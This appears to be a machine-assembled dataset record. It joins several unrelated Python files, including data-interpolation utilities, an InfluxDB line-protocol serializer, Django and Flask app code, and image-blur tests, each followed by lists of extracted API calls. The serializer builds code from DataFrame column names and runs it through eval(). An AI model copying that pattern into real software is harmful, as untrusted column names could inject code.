[((1401, 1421), 'bokeh.util.testing.verify_api', 'verify_api', (['bid', 'api'], {}), '(bid, api)\n', (1411, 1421), False, 'from bokeh.util.testing import verify_api\n'), ((2058, 2068), 'bokeh.document.Document', 'Document', ([], {}), '()\n', (2066, 2068), False, 'from bokeh.document import Document\n'), ((2073, 2090), 'bokeh.io.doc.set_curdoc', 'bid.set_curdoc', (['d'], {}), '(d)\n', (2087, 2090), True, 'import bokeh.io.doc as bid\n'), ((1807, 1819), 'bokeh.io.doc.curdoc', 'bid.curdoc', ([], {}), '()\n', (1817, 1819), True, 'import bokeh.io.doc as bid\n'), ((1823, 1833), 'bokeh.io.state.curstate', 'curstate', ([], {}), '()\n', (1831, 1833), False, 'from bokeh.io.state import curstate\n'), ((2102, 2112), 'bokeh.io.state.curstate', 'curstate', ([], {}), '()\n', (2110, 2112), False, 'from bokeh.io.state import curstate\n')]
|
"""Methods that are elvis related and used in multiple times inside elvis."""
import datetime
import math
import pandas as pd
from elvis.distribution import EquallySpacedInterpolatedDistribution
def create_time_steps(start_date, end_date, resolution):
"""Create list from start, end date and resolution of the simulation period with all individual
time steps.
Args:
start_date: (:obj: `datetime.datetime`): First time stamp.
end_date: (:obj: `datetime.datetime`): Upper bound for time stamps.
resolution: (:obj: `datetime.timedelta`): Time in between two adjacent time stamps.
Returns:
time_steps: (list): Contains time_steps in `datetime.datetime` format
"""
# Create list containing all time steps as datetime.datetime object
time_step = start_date
time_steps = []
while time_step <= end_date:
time_steps.append(time_step)
time_step += resolution
return time_steps
def num_time_steps(start_date, end_date, resolution):
"""Returns the number of time steps given a period described by its start and end date
and the resolution.
Args:
start_date: (:obj: `datetime.datetime`): First time stamp.
end_date: (:obj: `datetime.datetime`): Upper bound for time stamps.
resolution: (:obj: `datetime.timedelta`): Time in between two adjacent time stamps.
Returns:
num_time_steps: (int): Number of time steps to be simulated.
"""
return int((end_date - start_date) / resolution) + 1
def transform_data(input_df, resolution, start_date, end_date):
assert len(input_df) >= 2, "must provide more than two datapoints"
assert resolution.seconds >= 60, "resolutions lower than one minute not supported"
# convert to a list of dates and corresponding values
if isinstance(input_df, pd.DataFrame):
input_data = []
for idx, value in input_df.iteritems():
input_data.append((idx, value))
else:
assert isinstance(input_df, list), "input must be list or pandas.DataFrame"
input_data = input_df
# get resolution and time frame of input data
input_start_date = input_data[0][0]
input_resolution = input_data[1][0] - input_start_date
input_resolution_seconds = input_resolution.seconds
# linearly interpolate missing values in input data
interp_input_data = [input_data[0], input_data[1]]
for i in range(2, len(input_data)):
prev = input_data[i - 1]
curr = input_data[i]
dist = curr[0] - prev[0]
# distance between data points is equal to resolution
if dist == input_resolution:
interp_input_data.append(curr)
continue
# check if distance is evenly divisible by resolution
rem = dist.seconds % input_resolution_seconds
if rem != 0:
raise Exception("inconsistent distance between data points")
steps = math.floor(dist.seconds / input_resolution_seconds)
if steps > 0:
step = (curr[1] - prev[1]) / steps
for j in range(1, steps):
interp_input_data.append((prev[0] + (j * input_resolution), prev[1] + (j * step)))
interp_input_data.append(curr)
# transform input data to minute resolution
input_data_minute_res = []
if input_resolution_seconds > 60:
# interpolate datapoints to get minute resolution
interp_steps = math.floor(input_resolution_seconds / 60)
minute_res = datetime.timedelta(seconds=60)
for j in range(1, len(interp_input_data)):
prev = interp_input_data[j - 1][1]
curr = interp_input_data[j][1]
step = (curr - prev) / interp_steps
input_data_minute_res.append(interp_input_data[j - 1])
for k in range(1, interp_steps):
input_data_minute_res.append(
(interp_input_data[j - 1][0] + (k * minute_res), prev + (k * step)))
elif input_resolution_seconds < 60:
# take the average of datapoints within a minute
curr_sum = interp_input_data[0][1]
curr_cnt = 1
curr_date = input_start_date
curr_start_date = curr_date
for j in range(1, len(interp_input_data)):
next_date = interp_input_data[j][0]
# check if we're at the next minute
if next_date.minute != curr_date.minute:
input_data_minute_res.append((curr_start_date, curr_sum / curr_cnt))
curr_sum = 0
curr_cnt = 0
curr_start_date = next_date
curr_sum += interp_input_data[j][1]
curr_cnt += 1
curr_date = next_date
if curr_sum > 0:
input_data_minute_res.append((curr_start_date, curr_sum / curr_cnt))
else:
input_data_minute_res = interp_input_data
# now calculate averages for every unique (weekday, month) pair that we have available
available_datapoints = dict()
for date, value in input_data_minute_res:
weekday = date.weekday()
month = date.month
key = (weekday, month)
if key not in available_datapoints:
available_datapoints[key] = (
[0 for _ in range(0, 24 * 60)], [0 for _ in range(0, 24 * 60)])
minute_of_day = date.hour * 60 + date.minute
available_datapoints[key][0][minute_of_day] += value
available_datapoints[key][1][minute_of_day] += 1
for value in available_datapoints.values():
for j in range(0, len(value[0])):
if value[1][j] <= 1:
continue
value[0][j] /= value[1][j]
# uncomment to export data for all (weekday, month) pairs
# for key, value in available_datapoints.items():
# export_csv(value[0], "./input_data_averaged/" + str(key[0]) + "_" + str(key[1]) + ".csv")
# build the result by finding the closest (weekday, month) pair for every required day
result_data = []
curr_date = start_date
curr_day_data = None
prev_weekday = None
while curr_date < end_date:
curr_weekday = curr_date.weekday()
if prev_weekday is None or curr_weekday != prev_weekday:
curr_month = curr_date.month
prev_weekday = curr_weekday
if (curr_weekday, curr_month) in available_datapoints:
# use the available data for the day
curr_day_data = available_datapoints[(curr_weekday, curr_month)]
else:
# find the closest available data point
min_dist = math.inf
for key, value in available_datapoints.items():
dist = abs(key[0] - curr_weekday) + abs(key[1] - curr_month)
if dist >= min_dist:
continue
min_dist = dist
curr_day_data = value
minute_of_day = curr_date.hour * 60 + curr_date.minute
result_data.append((curr_date, curr_day_data[0][minute_of_day]))
curr_date += resolution
return result_data
def adjust_resolution(preload, res_data, res_simulation):
"""Adjusts res_data of the transformer preload to the simulation res_data.
Args:
preload: (list): Containing the transformer preload in "wrong"
res_data.
res_data: (datetime.timedelta): Time in between two adjacent data points of
transformer preload with "wrong" res_data.
res_simulation: (datetime.timedelta): Time in between two adjacent time steps in
the simulation.
Returns:
transformer_preload_new_res: (list): Transformer preload with linearly interpolated data
points having the res_data of the simulation.
"""
x_values = list(range(len(preload)))
distribution = EquallySpacedInterpolatedDistribution.linear(
list(zip(x_values, preload)), None)
coefficient = res_simulation / res_data
x_values_new_res = list(range(math.ceil(len(preload) * 1 / coefficient)))
x_values_new_res = [x * coefficient for x in x_values_new_res]
transformer_preload_new_res = []
for x in x_values_new_res:
transformer_preload_new_res.append(distribution[x])
return transformer_preload_new_res
def repeat_data(preload, num_simulation_steps):
"""Repeats the transformer preload data until there are as many values as there are
simulation steps.
Args:
preload: (list): Containing the data (floats) to be repeated.
num_simulation_steps: (int): Number of simulation steps and expected length of
the transformer preload after it is repeated.
Returns:
transformer_preload_repeated: (list): Repeated values. len() = num_simulation_steps.
"""
n = math.floor(num_simulation_steps / len(preload))
transformer_preload_repeated = preload * n
values_to_add = num_simulation_steps - len(transformer_preload_repeated)
transformer_preload_repeated += preload[:values_to_add]
return transformer_preload_repeated
def floor(value, decimals=3):
"""Floors a value to 3 decimals."""
assert isinstance(decimals, int), 'Decimals must be of type int'
coeff = 10**decimals
value = math.floor(value * coeff) / coeff
return value
|
[
"math.floor",
"datetime.timedelta"
] |
[((2940, 2991), 'math.floor', 'math.floor', (['(dist.seconds / input_resolution_seconds)'], {}), '(dist.seconds / input_resolution_seconds)\n', (2950, 2991), False, 'import math\n'), ((3439, 3480), 'math.floor', 'math.floor', (['(input_resolution_seconds / 60)'], {}), '(input_resolution_seconds / 60)\n', (3449, 3480), False, 'import math\n'), ((3502, 3532), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (3520, 3532), False, 'import datetime\n'), ((9255, 9280), 'math.floor', 'math.floor', (['(value * coeff)'], {}), '(value * coeff)\n', (9265, 9280), False, 'import math\n')]
|
"""
This is a django-split-settings main file.
For more information read this:
https://github.com/sobolevn/django-split-settings
Close copy of https://medium.com/wemake-services/managing-djangos-settings-e2b7f496120d
Default environment is `development`.
To change settings file: `DJANGO_ENV=production python manage.py runserver`
"""
from os import environ
from split_settings.tools import include, optional
from myAzure.az_connect import AzureConnection
azCon = AzureConnection()
azCon.main()
base_settings = [
# Select the right env:
"environments/%s.py" % azCon.env,
# standard django settings
"components/common.py",
# Optionally override some settings:
# optional('environments/local.py'),
]
include(*base_settings)
|
[
"split_settings.tools.include",
"myAzure.az_connect.AzureConnection"
] |
[((472, 489), 'myAzure.az_connect.AzureConnection', 'AzureConnection', ([], {}), '()\n', (487, 489), False, 'from myAzure.az_connect import AzureConnection\n'), ((731, 754), 'split_settings.tools.include', 'include', (['*base_settings'], {}), '(*base_settings)\n', (738, 754), False, 'from split_settings.tools import include, optional\n')]
|
def ilog2(n):
'''
Return binary logarithm base two of n.
>>> ilog2(0)
Traceback (most recent call last):
...
ValueError: math domain error
>>> ilog2(-10)
Traceback (most recent call last):
...
ValueError: math domain error
>>> [ilog2(i) for i in range(1, 10)]
[0, 1, 1, 2, 2, 2, 2, 3, 3]
>>> [ilog2(2**i) for i in range(1,10)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> [ilog2((2**i)+1) for i in range(1,10)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> [ilog2((2**i)-1) for i in range(1,10)]
[0, 1, 2, 3, 4, 5, 6, 7, 8]
'''
if n <= 0:
raise ValueError('math domain error')
return len(bin(n)) - 3
if __name__ == '__main__':
import doctest
doctest.testmod()
|
[
"doctest.testmod"
] |
[((718, 735), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (733, 735), False, 'import doctest\n')]
|
import re
from functools import reduce
from itertools import chain
from typing import Union, Dict, List
import pandas as pd
import numpy as np
from .common import *
DataFrameType = Union[pd.DataFrame, Dict[str, pd.DataFrame], List[Dict[str, pd.DataFrame]]]
# Serialization helper functions
# -------------------------------
def _serializer(series) -> pd.DataFrame:
df = pd.DataFrame(series.get('values', []), columns=series['columns'])
if 'time' not in df.columns:
return df
df: pd.DataFrame = df.set_index(pd.to_datetime(df['time'])).drop('time', axis=1)
df.index = df.index.tz_localize('UTC')
df.index.name = None
if 'tags' in series:
for k, v in series['tags'].items():
df[k] = v
if 'name' in series:
df.name = series['name']
return df
def _get_name(series):
tags = [f'{k}={v}' for k, v in series.get('tags', {}).items()]
return ','.join(filter(None, [series.get('name'), *tags])) or None
def _drop_zero_index(df):
if isinstance(df.index, pd.DatetimeIndex):
if all(i.value == 0 for i in df.index):
return df.reset_index(drop=True)
return df
def parse(resp) -> DataFrameType:
"""Makes a dictionary of DataFrames from a response object"""
statements = []
for statement in resp['results']:
series = {}
for s in statement.get('series', []):
series[_get_name(s)] = _drop_zero_index(_serializer(s))
statements.append(series)
if len(statements) == 1:
series: dict = statements[0]
if len(series) == 1:
return list(series.values())[0] # DataFrame
else:
return series # dict
return statements # list
# Parsing helper functions
# -------------------------
def _itertuples(df):
"""Custom implementation of ``DataFrame.itertuples`` that
returns plain tuples instead of namedtuples. About 50% faster.
"""
cols = [df.iloc[:, k] for k in range(len(df.columns))]
return zip(df.index, *cols)
def _replace(df):
obj_cols = {k for k, v in dict(df.dtypes).items() if v is np.dtype('O')}
other_cols = set(df.columns) - obj_cols
obj_nans = (f'{k}="nan"' for k in obj_cols)
other_nans = (f'{k}=nani?' for k in other_cols)
replacements = [
('|'.join(chain(obj_nans, other_nans)), ''),
(',{2,}', ','),
('|'.join([', ,', ', ', ' ,']), ' '),
]
return replacements
def serialize(df, measurement, tag_columns=None, **extra_tags) -> bytes:
"""Converts a Pandas DataFrame into line protocol format"""
# Pre-processing
if measurement is None:
raise ValueError("Missing 'measurement'")
if not isinstance(df.index, pd.DatetimeIndex):
raise ValueError('DataFrame index is not DatetimeIndex')
tag_columns = set(tag_columns or [])
isnull = df.isnull().any(axis=1)
# Make parser function
tags = []
fields = []
for k, v in extra_tags.items():
tags.append(f"{k}={escape(v, key_escape)}")
for i, (k, v) in enumerate(df.dtypes.items()):
k = k.translate(key_escape)
if k in tag_columns:
tags.append(f"{k}={{p[{i+1}]}}")
elif issubclass(v.type, np.integer):
fields.append(f"{k}={{p[{i+1}]}}i")
elif issubclass(v.type, (np.float, np.bool_, np.floating)):
fields.append(f"{k}={{p[{i+1}]}}")
else:
# String escaping is skipped for performance reasons
# Strings containing double-quotes can cause strange write errors
# and should be sanitized by the user.
# e.g., df[k] = df[k].astype('str').str.translate(str_escape)
fields.append(f"{k}=\"{{p[{i+1}]}}\"")
fmt = (f'{measurement}', f'{"," if tags else ""}', ','.join(tags),
' ', ','.join(fields), ' {p[0].value}')
f = eval("lambda p: f'{}'".format(''.join(fmt)))
# Map/concat
if isnull.any():
lp = map(f, _itertuples(df[~isnull]))
rep = _replace(df)
lp_nan = (reduce(lambda a, b: re.sub(*b, a), rep, f(p))
for p in _itertuples(df[isnull]))
return '\n'.join(chain(lp, lp_nan)).encode('utf-8')
else:
return '\n'.join(map(f, _itertuples(df))).encode('utf-8')
|
[
"numpy.dtype",
"pandas.to_datetime",
"itertools.chain",
"re.sub"
] |
[((533, 559), 'pandas.to_datetime', 'pd.to_datetime', (["df['time']"], {}), "(df['time'])\n", (547, 559), True, 'import pandas as pd\n'), ((2106, 2119), 'numpy.dtype', 'np.dtype', (['"""O"""'], {}), "('O')\n", (2114, 2119), True, 'import numpy as np\n'), ((2304, 2331), 'itertools.chain', 'chain', (['obj_nans', 'other_nans'], {}), '(obj_nans, other_nans)\n', (2309, 2331), False, 'from itertools import chain\n'), ((4044, 4057), 're.sub', 're.sub', (['*b', 'a'], {}), '(*b, a)\n', (4050, 4057), False, 'import re\n'), ((4147, 4164), 'itertools.chain', 'chain', (['lp', 'lp_nan'], {}), '(lp, lp_nan)\n', (4152, 4164), False, 'from itertools import chain\n')]
|
from django.db.models import Q, QuerySet
from utilities.permissions import permission_is_exempt
class RestrictedQuerySet(QuerySet):
def restrict(self, user, action='view'):
"""
Filter the QuerySet to return only objects on which the specified user has been granted the specified
permission.
:param user: User instance
:param action: The action which must be permitted (e.g. "view" for "dcim.view_site"); default is 'view'
"""
# Resolve the full name of the required permission
app_label = self.model._meta.app_label
model_name = self.model._meta.model_name
permission_required = f'{app_label}.{action}_{model_name}'
# Bypass restriction for superusers and exempt views
if user.is_superuser or permission_is_exempt(permission_required):
qs = self
# User is anonymous or has not been granted the requisite permission
elif not user.is_authenticated or permission_required not in user.get_all_permissions():
qs = self.none()
# Filter the queryset to include only objects with allowed attributes
else:
attrs = Q()
for perm_attrs in user._object_perm_cache[permission_required]:
if type(perm_attrs) is list:
for p in perm_attrs:
attrs |= Q(**p)
elif perm_attrs:
attrs |= Q(**perm_attrs)
else:
# Any permission with null constraints grants access to _all_ instances
attrs = Q()
break
qs = self.filter(attrs)
return qs
|
[
"utilities.permissions.permission_is_exempt",
"django.db.models.Q"
] |
[((799, 840), 'utilities.permissions.permission_is_exempt', 'permission_is_exempt', (['permission_required'], {}), '(permission_required)\n', (819, 840), False, 'from utilities.permissions import permission_is_exempt\n'), ((1181, 1184), 'django.db.models.Q', 'Q', ([], {}), '()\n', (1182, 1184), False, 'from django.db.models import Q, QuerySet\n'), ((1380, 1386), 'django.db.models.Q', 'Q', ([], {}), '(**p)\n', (1381, 1386), False, 'from django.db.models import Q, QuerySet\n'), ((1449, 1464), 'django.db.models.Q', 'Q', ([], {}), '(**perm_attrs)\n', (1450, 1464), False, 'from django.db.models import Q, QuerySet\n'), ((1607, 1610), 'django.db.models.Q', 'Q', ([], {}), '()\n', (1608, 1610), False, 'from django.db.models import Q, QuerySet\n')]
|
import cv2
import numpy as np
from plantcv.plantcv import gaussian_blur
def test_gaussian_blur(test_data):
"""Test for PlantCV."""
# Read in test data
img = cv2.imread(test_data.small_rgb_img)
gaussian_img = gaussian_blur(img=img, ksize=(51, 51), sigma_x=0, sigma_y=None)
assert np.average(img) != np.average(gaussian_img)
def test_gaussian_blur_grayscale(test_data):
"""Test for PlantCV."""
# Read in test data
gray_img = cv2.imread(test_data.small_gray_img, -1)
gaussian_img = gaussian_blur(img=gray_img, ksize=(51, 51), sigma_x=0, sigma_y=None)
assert np.average(gray_img) != np.average(gaussian_img)
|
[
"cv2.imread",
"numpy.average",
"plantcv.plantcv.gaussian_blur"
] |
[((171, 206), 'cv2.imread', 'cv2.imread', (['test_data.small_rgb_img'], {}), '(test_data.small_rgb_img)\n', (181, 206), False, 'import cv2\n'), ((226, 289), 'plantcv.plantcv.gaussian_blur', 'gaussian_blur', ([], {'img': 'img', 'ksize': '(51, 51)', 'sigma_x': '(0)', 'sigma_y': 'None'}), '(img=img, ksize=(51, 51), sigma_x=0, sigma_y=None)\n', (239, 289), False, 'from plantcv.plantcv import gaussian_blur\n'), ((459, 499), 'cv2.imread', 'cv2.imread', (['test_data.small_gray_img', '(-1)'], {}), '(test_data.small_gray_img, -1)\n', (469, 499), False, 'import cv2\n'), ((519, 587), 'plantcv.plantcv.gaussian_blur', 'gaussian_blur', ([], {'img': 'gray_img', 'ksize': '(51, 51)', 'sigma_x': '(0)', 'sigma_y': 'None'}), '(img=gray_img, ksize=(51, 51), sigma_x=0, sigma_y=None)\n', (532, 587), False, 'from plantcv.plantcv import gaussian_blur\n'), ((301, 316), 'numpy.average', 'np.average', (['img'], {}), '(img)\n', (311, 316), True, 'import numpy as np\n'), ((320, 344), 'numpy.average', 'np.average', (['gaussian_img'], {}), '(gaussian_img)\n', (330, 344), True, 'import numpy as np\n'), ((599, 619), 'numpy.average', 'np.average', (['gray_img'], {}), '(gray_img)\n', (609, 619), True, 'import numpy as np\n'), ((623, 647), 'numpy.average', 'np.average', (['gaussian_img'], {}), '(gaussian_img)\n', (633, 647), True, 'import numpy as np\n')]
|
from __future__ import print_function, division
import numpy as np
import sys
scalarTypes = (complex, float, int, np.number)
if sys.version_info < (3,):
scalarTypes += (long, )
def isScalar(f):
if isinstance(f, scalarTypes):
return True
elif isinstance(f, np.ndarray) and f.size == 1 and isinstance(f[0], scalarTypes):
return True
return False
def asArray_N_x_Dim(pts, dim):
if type(pts) == list:
pts = np.array(pts)
assert isinstance(pts, np.ndarray), "pts must be a numpy array"
if dim > 1:
pts = np.atleast_2d(pts)
elif len(pts.shape) == 1:
pts = pts[:, np.newaxis]
assert pts.shape[1] == dim, "pts must be a column vector of shape (nPts, {0:d}) not ({1:d}, {2:d})".format(*((dim,)+pts.shape))
return pts
def requires(modules):
"""Decorator to wrap functions with soft dependencies.
This function was inspired by the `requires` function of pysal,
which is released under the 'BSD 3-Clause "New" or "Revised" License'.
https://github.com/pysal/pysal/blob/master/pysal/lib/common.py
Parameters
----------
modules : dict
Dictionary containing soft dependencies, e.g.,
{'matplotlib': matplotlib}.
Returns
-------
decorated_function : function
Original function if all soft dependencies are met, otherwise
it returns an empty function which prints why it is not running.
"""
# Check the required modules, add missing ones in the list `missing`.
missing = []
for key, item in modules.items():
if item is False:
missing.append(key)
def decorated_function(function):
"""Wrap function."""
if not missing:
return function
else:
def passer(*args, **kwargs):
print(('Missing dependencies: {d}.'.format(d=missing)))
print(('Not running `{}`.'.format(function.__name__)))
return passer
return decorated_function
|
[
"numpy.array",
"numpy.atleast_2d"
] |
[((460, 473), 'numpy.array', 'np.array', (['pts'], {}), '(pts)\n', (468, 473), True, 'import numpy as np\n'), ((585, 603), 'numpy.atleast_2d', 'np.atleast_2d', (['pts'], {}), '(pts)\n', (598, 603), True, 'import numpy as np\n')]
|
from flask import Flask
from flask import render_template
from flask import request
#from flask_wtf import CsrfProtect #this is what the video said, but it gives a warning, the one one line below works without warnings
from flask_wtf import CSRFProtect
import forms
from flask import make_response #for the cookie
from flask import session
from flask import url_for
from flask import redirect
from flask import flash
from flask import g #to allow global variables. They will be alive until the end of after_request, i.e. return response.
#It will be used in only one petition. Two clients cannot share the same global variable.
from config import DevelopmentConfig
from models import db
from models import userstest #name of the MODEL, not table to import
#from models import Comment in CF
from models import comments
from helper import date_format
from flask_mail import Mail
from flask_mail import Message
import threading #to send the emails in the background so the app is faster
from flask import copy_current_request_context
#after CF
from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users
#####Just for creating raw MySQL queries########
from sqlalchemy import create_engine
eng = create_engine(DevelopmentConfig.SQLALCHEMY_DATABASE_URI)
################################################
import sys
import urllib.parse #to encode urls
import pandas as pd
pd.set_option('display.expand_frame_repr', False) #just to make the print of pandas wider
from sqlalchemy import desc, func, and_, or_
import json
from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score
import numpy as np
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_admin import BaseView, expose
app = Flask(__name__)
app.config.from_object(DevelopmentConfig) #here is where we decide if Development or Production.
#before using config:
#app.secret_key = 'my_secret_key' #though it is a good practice to use os.get() to get the secret key, and not write it in the code
#before using config:
#csrf = CsrfProtect(app)
#after config
#csrf = CsrfProtect() #now we do this at the end, in if __name__...
#this is what the video said, but it gives a warning, the one one line below works without warnings
#csrf = CSRFProtect() THIS WASN'T WORKING
csrf = CSRFProtect(app) #from https://flask-wtf.readthedocs.io/en/stable/csrf.html
mail = Mail()
def send_email(user_email, username): #to know where to send it and write the username in the email
msg = Message('Thank you for signing up!', #title of the email.
sender = app.config['MAIL_USERNAME'],
recipients = [user_email])
msg.html = render_template('email.html', username = username)
mail.send(msg) #here we actually send the message
@app.errorhandler(404)
def page_not_found(e): #anything works, not only an 'e'
return render_template('404.html'), 404 #flask doesn't send the error number, we have to do it.
@app.before_request #we use this to validate , like if the user has permission to access that url, or even if we need a visit counter to that url,
def before_request():
if 'username' not in session:
print (request.endpoint) #this gives you the last part of the url
print ('User needs to log in!')
#validate the url...validate if the user is authenticated, let's imagine we want to make 'comment' only accessible to authenticated users
if 'username' not in session and request.endpoint in ['comment']:
return redirect(url_for('login'))
elif 'username' in session and request.endpoint in ['login', 'create']: #why an authenticated user would go to login or create, let's send him/her to index
return redirect(url_for('index')) #the function index, not the route.
g.test = 'test' #here we create the global variables. ?I guess we could pull all of one vendor's data here??
@app.route('/')
def index():
'''
#we are reading cookies here
#custome_cookie = request.cookies.get('custome_cookie') this would receive the custome_cookie we created and sent ('Eduardo')
custome_cookie = request.cookies.get('custome_cookies', 'Undefined') #this does: if you don't find custome_cookie within custome_cookies, it returns undefined
print (custome_cookie)
'''
if 'username' in session: #session is our sessions dictionary
username = session['username']
title = "Index"
return render_template('index.html', title = title)
@app.route('/logout') #here we destroy the cookies
def logout():
if 'username' in session:
session.pop('username') #destroy cookie
return redirect(url_for('login')) # to redirect, using url_for we type the function name, not the path, so just 'login', no /asddad/adad/login
@app.route('/login', methods = ['GET', 'POST'])
def login():
login_form = forms.LoginForm(request.form)
if request.method == 'POST' and login_form.validate():
username = login_form.username.data
password = login_form.password.data
user = userstest.query.filter_by(username = username).first() #select * from users where username = username limit 1. It returns an object with the information of the user. If not found, it will return a None
if user is not None and user.verify_password(password):
success_message = 'Welcome {}'.format(username)
flash(success_message)
session['username'] = username
session['user_id'] = user.id
return redirect( url_for('index') )
else:
error_message = 'Invalid username or password'
flash(error_message)
#after a;dding session['username'] = username a few lines above, isn't this one left over?
#session['username'] = login_form.username.data #a session variable called username will be created each time whose value is the own username
return render_template('login.html', form = login_form)
@app.route('/cookie')
def cookie():
#we are creating cookies here
response = make_response( render_template('cookie.html'))
response.set_cookie('custome_cookie', 'Eduardo')
return response
#by default in flask, only method GET, we have to specify POST
@app.route('/comment', methods = ['GET', 'POST'])
def comment():
comment_form = forms.CommentForm(request.form)
if request.method == 'POST' and comment_form.validate(): #to validate forms inputs. We also had to add it in _macro.html, in the list {{field.errors}}
'''print(comment_form.username.data)
print(comment_form.email.data)
print(comment_form.comment.data)
else:
print ("Error in the form!!")'''
user_id = session['user_id'] #since we work with cookies, this is the way to get the user_id
comment = comments(user_id = user_id,
text = comment_form.comment.data)
print(comment)
db.session.add(comment)
db.session.commit()
success_message = "New comment created"
flash(success_message)
title = "Flask Course"
return render_template('comment.html', title = title, comment_form = comment_form)
@app.route('/create', methods = ['GET', 'POST'])
def create():
create_form = forms.CreateForm(request.form)
if request.method == 'POST' and create_form.validate():
user = userstest(create_form.username.data,
create_form.password.data,
create_form.email.data)
db.session.add(user) #this needs an objects heredated from model, like user
db.session.commit() #here we insert it in the database
#SQLAlchemy is clever enough to know hwo to open and close connections, so we don't have to worry about that if we wrtie those two lines.
@copy_current_request_context #this is like the bridge to send the email in the background..
def send_message(email,username):
send_email(email, username)
sender = threading.Thread(name='mail_sender',
target = send_message,
args = (user.email, user.username)) #arguments of the function that sends the email.
sender.start()
success_message = 'User registered in the database'
flash(success_message)
return render_template('create.html', form = create_form)
@app.route('/reviews/', methods=['GET'])
@app.route('/reviews/<int:page>', methods = ['GET']) #we have to write it twice to make pages
def reviews(page = 1): # =1 is only the default value, so /reviews/ and /reviews/1 is the same
per_page = 1000
comment_list = comments.query.join(userstest).add_columns(
userstest.username, #the model, not the table
comments.text,
comments.created_date).paginate(page,per_page,True) #(page, rows per page, if True=404, if False: empty)
return render_template('reviews.html', comments = comment_list, date_format = date_format) #we send the function as a parameter
@app.after_request
def after_request(response):
return response #always return response
@app.route('/rfi/', methods=['GET'])
@app.route('/rfi/<vendor_name>/', methods=['GET'], defaults={ 'module_name' : None})
@app.route('/rfi/<vendor_name>/<module_name>/', methods=['GET', 'POST'])
def rfi(vendor_name, module_name):
vendorid = vendors.query.filter_by(vendor_name = vendor_name).add_columns(vendors.vendorid).first()[1]
current_quarter = current_quarteryear.query.add_columns(current_quarteryear.quarter).first()[1]
current_year = current_quarteryear.query.add_columns(current_quarteryear.year).first()[1]
print('current quarter:', current_quarter, current_year)
if module_name is None:
title = vendor_name
'''
This commented block pulled every module a vendor had participated looking at rfielements, but it's better doing it through the table vendors_rfi
smce_ids_list_raw = rfielements.query.filter_by(vendor_id = vendorid).add_columns(rfielements.smce_id).all()
smce_ids_list = set()
for item in smce_ids_list_raw:
smce_ids_list.add(item[1])
module_ids_list_raw = suitemodcatelem.query.filter(suitemodcatelem.smceid.in_(smce_ids_list)).add_columns(suitemodcatelem.module_id).all()
module_ids_list = set()
for item in module_ids_list_raw:
module_ids_list.add(item[1])
module_ids_list = sorted(module_ids_list)
print(module_ids_list)
module_names_raw = modules.query.filter(modules.moduleid.in_(module_ids_list)).add_columns(modules.module_name).all()
module_names = []
for item in module_names_raw:
module_names.append(item[1])
print(module_names)
'''
suitemod_ids_raw = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.suitemod_id, vendors_rfi.status, vendors_rfi.current_round).all()
print('suitemod_ids_raw',suitemod_ids_raw)
module_status_round = []
for item in suitemod_ids_raw:
module_name = suitemodules.query.filter_by(suitemodid = item[1]).order_by(desc(suitemodules.update_date)).add_columns(suitemodules.suitemod_name).first()[1]
if item[2] == 'N':
status = 'New'
elif item[2] == 'R':
status = 'Refreshing'
elif item[2] == 'E':
status = 'Existing'
elif item[2] == 'Z':
status = 'Not participaging anymore'
else:
sys.exit('Status is neither N, R, E or Z')
current_round = item[3]
module_status_round.append([module_name, status, current_round])
print('module_status_round', module_status_round)
return render_template('rfi:vendor.html', title = title, vendor_name = vendor_name, module_status_round = module_status_round, urllib_parse_quote = urllib.parse.quote)
else:
title = vendor_name + ' - ' + module_name
suitemodid = suitemodules.query.filter_by(suitemod_name = module_name).add_columns(suitemodules.suitemodid).first()[1]
status = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.status).first()[1]
current_round = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.current_round).first()[1]
form = forms.ElementForm(request.form)
'''if status == 'N' or status == 'R': Not necessary anymore since now current_round is 0, 1 or 2.
current_round = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).add_columns(vendors_rfi.current_round).first()[1]'''
print('status', status, '\ncurrent_round', current_round)
print('suitemodid', suitemodid)
suitemodcat_list_raw = suitemodcat.query.filter_by(suitemod_id = suitemodid).add_columns(suitemodcat.suitemodcatid, suitemodcat.category_name_id).all()
suitemodcat_list = []
category_name_ids_list = [] #same lenght as suitemodcat_list
for item in suitemodcat_list_raw:
suitemodcat_list.append(item[1])
category_name_ids_list.append(item[2])
print('suitemodcat_list', suitemodcat_list)
ids_list_raw = []
for item in suitemodcat_list:
ids_list_raw.append(suitemodcatelem.query.filter_by(suitemodcat_id = item).add_columns(suitemodcatelem.suitemodcat_id, suitemodcatelem.smceid, suitemodcatelem.element_name_id, suitemodcatelem.variant_id).all())
ids_list = [] #[suitemodcatid, [scmeid, elementnameid, variantid]]
smce_ids_list = []
for item in suitemodcat_list: ids_list.append([item, []])
for item1 in ids_list_raw:
for item2 in item1:
index = suitemodcat_list.index(item2[1])
ids_list[index][1].append([item2[2],item2[3],item2[4]])
smce_ids_list.append(item2[2])
print('smce_ids_list', smce_ids_list)
last_provider_submission = rfielements_providers.query.filter_by(vendor_id = vendorid).filter(rfielements_providers.smce_id.in_(smce_ids_list)).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.update_date, rfielements_providers.user_id).first()[1:] #[date, user_id]
print('last_provider_submission', last_provider_submission)
print('ids_list[0]', ids_list[0])
#Averages table
categories_names = []
for item in category_name_ids_list: categories_names.append(category_names.query.filter_by(category_nameid = item).add_columns(category_names.category_name).first()[1])
categories_names.append('Average Score')
categories_ss_averages = []
total_suitemod_ss_sum = 0
total_suitemod_ss_len = 0
for item1 in ids_list:
category_ss_sum = 0
category_ss_len = 0
for item2 in item1[1]:
try:
